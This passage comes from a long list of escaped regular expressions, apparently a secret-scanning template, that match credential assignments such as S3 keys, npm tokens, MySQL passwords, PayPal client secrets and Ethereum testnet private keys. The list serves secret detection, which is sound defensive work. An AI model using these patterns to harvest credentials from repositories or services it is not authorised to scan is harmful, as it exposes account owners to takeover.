\"(?i)[\\\"']?s3[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?s3[_-]?bucket[_-]?name[_-]?assets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?s3[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rubygems[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rtd[_-]?store[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rtd[_-]?key[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?route53[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ropsten[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rinkeby[_-]?private[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rest[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?repotoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?reporting[_-]?webdav[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?reporting[_-]?webdav[_-]?pwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?release[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?release[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?registry[_-]?secure[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?registry[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rediscloud[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?redis[_-]?stunnel[_-]?urls[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?randrmusicapiaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?rabbitmq[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?quip[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?qiita[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pypi[_-]?passowrd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pushover[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?publish[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?publish[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?publish[_-]?access[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?project[_-]?config[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prod[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prod[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prod[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?private[_-]?signing[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pring[_-]?mail[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?preferred[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?prebuild[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgresql[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgresql[_-]?db[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgres[_-]?env[_-]?postgres[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?postgres[_-]?env[_-]?postgres[_-]?db[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?plugin[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?plotly[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?places[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?places[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pg[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pg[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?personal[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?personal[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?percy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?percy[_-]?project[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?paypal[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?passwordtravis[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?parse[_-]?js[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?pagerduty[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?packagecloud[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ossrh[_-]?jira[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?os[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?os[_-]?auth[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?openwhisk[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?open[_-]?whisk[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?onesignal[_-]?user[_-]?auth[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?onesignal[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?skey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?pubkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?pkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?omise[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?okta[_-]?oauth2[_-]?clientsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?okta[_-]?client[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ofta[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ofta[_-]?region[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ofta[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?octest[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?octest[_-]?app[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?octest[_-]?app[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?oc[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?store[_-]?creds[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?store[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?storage[_-]?region[_-]?name[\\\"']?[^\\\\S\\r\n\n 
]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?object[_-]?storage[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?numbers[_-]?service[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nuget[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nuget[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nuget[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?npm[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?now[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?non[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?node[_-]?env[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ngrok[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ngrok[_-]?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nexuspassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nexus[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?new[_-]?relic[_-]?beta[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?netlify[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?nativeevents[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysqlsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysqlmasteruser[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?root[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?hostname[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mysql[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?my[_-]?secret[_-]?env[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n 
- \"(?i)[\\\"']?multi[_-]?workspace[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?workflow[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?disconnect[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?connect[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?multi[_-]?bob[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?minio[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?minio[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mile[_-]?zero[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mh[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mh[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mg[_-]?public[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mg[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapboxaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mapbox[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?manifest[_-]?app[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manifest[_-]?app[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mandrill[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?managementapiaccesstoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?management[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manage[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?manage[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?secret[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?pub[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?pub[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?mailgun[_-]?priv[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 